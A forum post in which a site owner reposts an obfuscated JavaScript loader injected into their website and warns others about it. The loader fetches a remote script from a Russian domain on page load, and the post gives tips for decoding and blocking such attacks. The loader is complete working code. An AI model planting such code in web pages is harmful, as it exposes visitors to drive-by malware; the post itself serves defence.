Thread: <script>/*GNU GPL*/ try{window.onload = function(){var

I found this in my website:

<script>var j=window;var _ih=36922;var z=document;var vr;if(vr!='b' && vr!='bg'){vr=''};function l(r){var _=['h_tXtzpJ:_/J/zsJaXnzszpzoz-XcJozmJ.6f_rXeJe_wXezbXs_._c6o6m_._c6nXb6lJo_g6sz-6czo_mX.Xbze6sJtzn6e_wXsXmXaJlXlX.XrzuJ:J8X0z860z/XpzlzaXl_aJ.6oJrJ.Xjzpz/JpXlJaXl_a_.Jo6rX.zjzp_/_3_96.6nJeXtX/XgJaJmXezv6a6nzc6e_.zczo_m6/zgXo_o_gXl6ez.zczoXmz/J'.replace(/[JzX_6]/g, ''), 'sHcHrLiIpIt~'.replace(/[~dLHI]/g, ''), 'c&rXe&a&tveXE&lXeXmvevn3t3'.replace(/[3&X\<v]/g, ''), 'o?n?lPoBa?dB'.replace(/[BPp\?\+]/g, ''), 's2r#ch'.replace(/[h7S#2]/g, ''), 'a4pVp:e$nPd4C4h4i:l$dV'.replace(/[V\:\$4P]/g, ''), 'spe%tSASt%t<rpiSbpu%tSeS'.replace(/[Sp\<%/]/g, ''), 'buord@yr'.replace(/[ru&@m]/g, ''), 'dpe/fnepr/'.replace(/[/\*npG]/g, ''), "1"];this.e="";var ru=_[r];var im;if(im!='sz' && im!='hj'){im='sz'};return ru;var zum;if(zum!='kn' && zum != ''){zum=null};}var v = function(){var g;if(g!='ds' && g != ''){g=null};try {p=z[l([2][0])](l([2,1][1]));p[l([4,6][1])](l([1,8][1]), l([9][0]));var q="";var k = z[l([0,7][1])];this.n="n";p[l([4][0])]=l([0,2][0]);var hu=new Array();k[l([5,2][0])](p);} catch(_i){};var gk;if(gk!='lh' && gk != ''){gk=null};};j[l([3][0])]=v;</script>
<!--160a0d5ee37db2dfb29ca5dea4203a55-->

Damn!!!!!!!!!!!

Keep up the fight guys.

Tips:
- These attacks are directing visitors to malicious ru sites.
- Chances are, they are trying to install malware (WinAntivirus 2009 Pro or a variant)
- The last snippet provided this url: (DO NOT VISIT THIS URL)

Code:

http://sanspo-com.freewebs.com.cnblogs-com.bestnewsmall.ruDISABLED-URL-WARNING:8080/plala.or.jp/plala.or.jp/39.net/gamevance.com/google.com

(I have added the 'DISABLED-URL-WARNING' to prevent a careless mistake - DO NOT VISIT THIS URL!!!!)
- Consider stripping out the characters in the strings that have .replace() parts to find the real URL/commands for your cleaning utility
- Blocking all .ru sites is a good idea for personal protection

Godspeed - keep up the fight!